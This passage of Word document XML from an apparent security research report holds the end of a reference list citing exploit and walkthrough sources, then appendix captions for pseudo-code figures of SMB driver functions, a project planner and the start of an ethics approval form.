            <w:t>Research Designs</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>, 5th ed. Los Angeles: SAGE Publication Inc., 2018.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="02137EAE" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="665522800"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[53]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">E. J. Caruana, M. Roman, J. Hernández-Sánchez, and P. Solli, “Longitudinal studies,” </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t>Journal of Thoracic Disease</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>, vol. 7, no. 11, pp. E537–E540, 2015, doi: 10.3978/J.ISSN.2072-1439.2015.10.63.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="40EF8292" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1390375011"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[54]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload.” https://github.com/JohnHammond/msdt-follina#readme (accessed Jul. 30, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3F70FF12" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="669329460"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“TryHackMe! Ghostcat CVE-2020-1938 - YouTube.” https://www.youtube.com/watch?v=-Cy4u6fA3Os (accessed Jun. 26, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6CF632D3" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1681661406"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[56]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Hack The Box: Jerry Walkthrough [Apache Tomcat, Default Credentials, Payload Creation] - YouTube.” https://www.youtube.com/watch?v=ipiKmdW7pJo (accessed Jun. 28, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3C08A7F6" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1518959257"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources.” https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/ (accessed Jun. 28, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="33206401" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1679651130"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[58]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Exfiltration, Tactic TA0010 - Enterprise | MITRE ATT&amp;CK®.” https://attack.mitre.org/tactics/TA0010/ (accessed Aug. 09, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7CA959D2" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1736049260"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>[59]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Covering Your Tracks.” https://hack.technoherder.com/covering-your-tracks/ (accessed Aug. 09, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="07E7B6DE" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1809938362"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[60]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“DoublePulsar – A Very Sophisticated Payload for Windows - SecPod Blog.” https://www.secpod.com/blog/doublepulsar-a-very-sophisticated-payload-for-windows/ (accessed Jun. 23, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5F5F1393" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="970403880"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[61]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Data Exfiltration: What It Is and How to Prevent It | Mimecast.” https://www.mimecast.com/blog/what-is-data-exfiltration/ (accessed Aug. 08, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="488F0355" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:spacing w:line="259" w:lineRule="auto"/>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="58CF1590" w14:textId="67587BB7" w:rsidR="0097339C" w:rsidRDefault="0097339C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAEC26" w14:textId="179A12C0" w:rsidR="00DF42B8" w:rsidRPr="002F7CF9" w:rsidRDefault="0097339C" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="_Toc113190765"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 1</w:t>
      </w:r>
      <w:r w:rsidR="00103ABA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="002F7CF9">
        <w:t xml:space="preserve">APPENDIX 1 – </w:t>
      </w:r>
      <w:r w:rsidR="002F7CF9" w:rsidRPr="002F7CF9">
        <w:t>FUNCTION’S PSEUDO CODE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:p w14:paraId="49D25E46" w14:textId="18B8ED68" w:rsidR="00DF42B8" w:rsidRDefault="00FC457E" w:rsidP="00EC65FF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC457E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DAC7625" wp14:editId="2055DAD5">
            <wp:extent cx="6772759" cy="6261762"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="24765"/>
            <wp:docPr id="60" name="Picture 60"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A picture containing timeline&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6791388" cy="6278986"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="097861F6" w14:textId="1ABB8D87" w:rsidR="00F82F7C" w:rsidRDefault="00F82F7C" w:rsidP="00EC65FF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="510" w:name="_Toc111363697"/>
      <w:bookmarkStart w:id="511" w:name="_Toc111363834"/>
      <w:bookmarkStart w:id="512" w:name="_Toc111981857"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>132</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Function Pseudo Code Srv0s2FeaListToNT </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNmQwZWVhMjgtMjUwNi00ZjM2LWE1YzQtZTQ0YThhNTcxNDVj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
          <w:id w:val="1980956844"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="510"/>
      <w:bookmarkEnd w:id="511"/>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p w14:paraId="4C3E53E0" w14:textId="0E24A759" w:rsidR="00FC457E" w:rsidRDefault="00FC457E" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F34B52F" w14:textId="5EBB23E9" w:rsidR="00FC457E" w:rsidRDefault="00F82F7C" w:rsidP="00EC65FF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F82F7C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677D4D6F" wp14:editId="1651E497">
            <wp:extent cx="6503921" cy="3667733"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="28575"/>
            <wp:docPr id="760259136" name="Picture 760259136" descr="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36" name="Picture 760259136" descr="Application&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6509201" cy="3670710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D7E2E" w14:textId="532ED964" w:rsidR="00CF5F9F" w:rsidRDefault="00CF5F9F" w:rsidP="00EC65FF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="513" w:name="_Toc111363698"/>
      <w:bookmarkStart w:id="514" w:name="_Toc111363835"/>
      <w:bookmarkStart w:id="515" w:name="_Toc111981858"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>133</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Function Pseudo Code for Srv0s2FeaListSize ToNT </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMjlhZWNlOWUtZWJhMS00MDYzLTk2ZDQtNzVjMjQwNjYyMmQ4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
          <w:id w:val="255414336"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="513"/>
      <w:bookmarkEnd w:id="514"/>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p w14:paraId="5E61FA6E" w14:textId="77777777" w:rsidR="00EC65FF" w:rsidRPr="00EC65FF" w:rsidRDefault="00EC65FF" w:rsidP="00EC65FF">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58FD2827" w14:textId="21B88847" w:rsidR="00433B34" w:rsidRDefault="00591141" w:rsidP="00EC65FF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591141">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02534937" wp14:editId="1D92BF10">
            <wp:extent cx="6656522" cy="2557591"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="14605"/>
            <wp:docPr id="62" name="Picture 6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A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId151"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6668530" cy="2562205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F50DFDD" w14:textId="23E88ED8" w:rsidR="00402BF5" w:rsidRDefault="00402BF5" w:rsidP="00EC65FF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="516" w:name="_Toc111363699"/>
      <w:bookmarkStart w:id="517" w:name="_Toc111363836"/>
      <w:bookmarkStart w:id="518" w:name="_Toc111981859"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>134</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Srv0s2FeaToNT </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNjA1ZDMwZmYtNTY2OC00YWI2LWFkMzUtMTgwMDUwOWNkYjJl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
          <w:id w:val="-508214354"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="516"/>
      <w:bookmarkEnd w:id="517"/>
      <w:bookmarkEnd w:id="518"/>
    </w:p>
    <w:p w14:paraId="1C22D7B2" w14:textId="7E4C2F7D" w:rsidR="003D7AF0" w:rsidRDefault="00477984" w:rsidP="00EC65FF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="003D7AF0" w:rsidRPr="003D7AF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76D63EB0" wp14:editId="325D7662">
            <wp:extent cx="6310969" cy="2863919"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="12700"/>
            <wp:docPr id="760259141" name="Picture 76025914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141" name="Picture 760259141" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId152"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6331853" cy="2873396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA703DF" w14:textId="01482EE6" w:rsidR="003D7AF0" w:rsidRDefault="003D7AF0" w:rsidP="00EC65FF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="519" w:name="_Toc111363700"/>
      <w:bookmarkStart w:id="520" w:name="_Toc111363837"/>
      <w:bookmarkStart w:id="521" w:name="_Toc111981860"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>135</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Pseudo Code for SMB BlockingSessionSetupAndx Function</w:t>
      </w:r>
      <w:r w:rsidR="008E5521">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNjI0ZmEzNzUtZjJjNy00ODgxLWE1NzgtOGZiMTk4NjQ0ODEx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
          <w:id w:val="-1339384270"/>
          <w:placeholder>
            <w:docPart w:val="3B56EF27566D4DF98A267FCD71310D6E"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="519"/>
      <w:bookmarkEnd w:id="520"/>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:p w14:paraId="55A76A89" w14:textId="7FB98EC4" w:rsidR="003D7AF0" w:rsidRDefault="003D7AF0" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E03AB6" w14:textId="7FE0C353" w:rsidR="00DF6D90" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="522" w:name="_Toc113190766"/>
      <w:r w:rsidRPr="001F52C3">
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 1</w:t>
      </w:r>
      <w:r w:rsidR="00CC3B4E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F52C3">
        <w:t xml:space="preserve">: APPENDIX 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D90">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00693FAD">
        <w:t>PROJECT PLANNER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p w14:paraId="51909472" w14:textId="6E149C70" w:rsidR="00DF6D90" w:rsidRPr="00DF6D90" w:rsidRDefault="00DF6D90" w:rsidP="00DF6D90">
      <w:pPr>
        <w:ind w:hanging="709"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF6D90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C2550C" wp14:editId="3591EAC1">
            <wp:extent cx="6563995" cy="4886888"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="28575"/>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rotWithShape="1">
                    <a:blip r:embed="rId153"/>
                    <a:srcRect l="1090" t="1460"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6573096" cy="4893663"/>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23B8847" w14:textId="447B9976" w:rsidR="004C5115" w:rsidRPr="00E42F41" w:rsidRDefault="00DF6D90" w:rsidP="00E42F41">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B428D" w14:textId="59BF1895" w:rsidR="002F7CF9" w:rsidRDefault="004C5115" w:rsidP="00CA0B92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="_Toc113190767"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 1</w:t>
      </w:r>
      <w:r w:rsidR="00CC3B4E">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: APPENDIX 3 - </w:t>
      </w:r>
      <w:r w:rsidR="002F7CF9">
        <w:t>ETHICS FORM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p w14:paraId="41DFB7DD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>APPLICATION FOR ETHICAL APPROVAL</w:t>
      </w:r>
    </w:p>
